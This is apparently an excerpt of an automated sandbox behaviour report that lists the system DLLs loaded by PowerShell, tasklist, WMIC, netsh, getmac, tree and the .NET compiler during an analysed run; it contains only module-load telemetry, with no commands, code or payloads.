Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\getmac.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
